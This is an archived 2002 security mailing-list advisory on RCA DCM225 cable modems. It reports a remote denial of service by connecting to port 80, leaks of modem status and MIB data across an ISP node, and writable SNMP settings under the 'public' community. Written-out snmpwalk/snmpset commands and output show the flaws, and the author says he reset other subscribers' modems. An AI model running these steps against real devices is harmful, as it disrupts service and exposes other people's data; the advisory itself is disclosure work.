RCA cable modem Deny of Service

From: Gabriel A. Maggiotti (gmaggiotat_private)
Date: Tue Mar 26 2002 - 17:27:00 PST


    ------------------------------------------------------------------------------
    Web:  http://qb0x.net      			Author: Gabriel A. Maggiotti
    Date: March 26, 2002       	        	E-mail: gmaggiotat_private
    ------------------------------------------------------------------------------
    
    
    
    
    General Info
    ------------
    Problem Type    :  denial of service, misconfiguration and information leak
    Vendor          :  www.rca.com
    Product         :  RCA cablemodems
    Model           :  DCM225 (perhaps others)
    Scope           :  Remote
    Risk            :  High
    
    
    Summary:
    -------
    
    The RCA Digital Cable Modem serves as a two-way high-speed bridge between your
    personal computer and a cable Internet Service Provider (ISP). It converts
    information that originates from the Internet or your computer into electronic
    messages that can be transported over the same wires your cable company uses to
    transport video signals.
    
    
    Problem:
    -------
    
    1-  Denial of Service:
    
            The RCA cable modem has two devices; the one for local connection is
    192.168.100.1. This device is used for requesting information about the status
    of the cable. The other device is 10.x.x.x and gives the same information.
            If you connect to the second device (10.x.x.x) on port 80, the RCA cable
    modem resets the user's Internet connection. I proved it with my own WAN IP
    10.1.1.x and with other cable modem users' IPs in the same WAN. All of them
    reset when I remotely connected to port 80 of the cable modems.
    
    
    
    2-  Information Leak:
         I can connect to the WAN IP 10.x.x.x of any cable modem user in my node
    and take a look at the user's cable modem status information such as:
    
            USB: Inactive
            Ethernet: 100
            BaseT
            MAC Address:  00 10 95 0a 05 62
            User: Active
            Signal Acquired at 573 MHz
            SNR: 36.0 dB
            Received Signal Strength: -4.0 dBmV
            Micro-Reflections: 20 dBc
            Connection: Acquired
            Frequency: 37 MHz
            Power Level: 44.0 dBmV
            Channel ID: 4
            Number of user conected: 1
    
    
    
    I can dump users' cable modem MIBs too.
    
            I can search the MIB table looking for my node server. I know that the
    node IP starts with 10.x.x.x, so I started to search in the MIB. Oops, I found
    it!
    
    69.1.4.2.0 = IpAddress: 10.20.250.1
    69.1.4.3.0 = IpAddress: 10.20.250.1
    69.1.4.4.0 = IpAddress: 10.20.250.1
    69.1.4.5.0 = "docsis_light_avalos"
    
            And then I recognized the word "avalos" because it is the name of the
    street where the node physically is.
    
    
    3-  Misconfiguration, because you can write to my own MIB table. Take a look:
    
    <quote>
    [gabi@pluto gabi]$ snmpwalk 192.168.100.1 public
    
    system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
    HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS
    2.5.0
    system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
    system.sysUpTime.0 = Timeticks: (141857) 0:23:38.57
    system.sysContact.0 = unassigned sysContact
    system.sysName.0 =
    system.sysLocation.0 =
    system.sysServices.0 = 79
    
    [gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysName.0 s lame
    system.sysName.0 = lame
    
    [gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysLocation.0 s
    lame_cyty
    system.sysName.0 = lame_city
    
    
    [gabi@pluto gabi]$ snmpwalk 192.168.100.1 public
    
    system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
    HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS: PSOS
    2.5.0
    system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
    system.sysUpTime.0 = Timeticks: (161396) 0:26:53.96
    system.sysContact.0 = unassigned sysContact
    system.sysName.0 = lame
    system.sysLocation.0 = lame_city
    system.sysServices.0 = 79
    </quote>
    
    
    ------------------------------------------------------------------------------
    research-listat_private is dedicated to interactively researching
    vulnerabilities, reporting potential or undeveloped holes in any kind of
    computer system. To subscribe to research-listat_private send a blank email to
    research-list-subscribeat_private. More help is available by sending an email
    to research-list-helpat_private.
    Note: the list doesn't allow html, it will be stripped from messages.
    ------------------------------------------------------------------------------
    



    This archive was generated by hypermail 2b30 : Wed Mar 27 2002 - 13:23:41 PST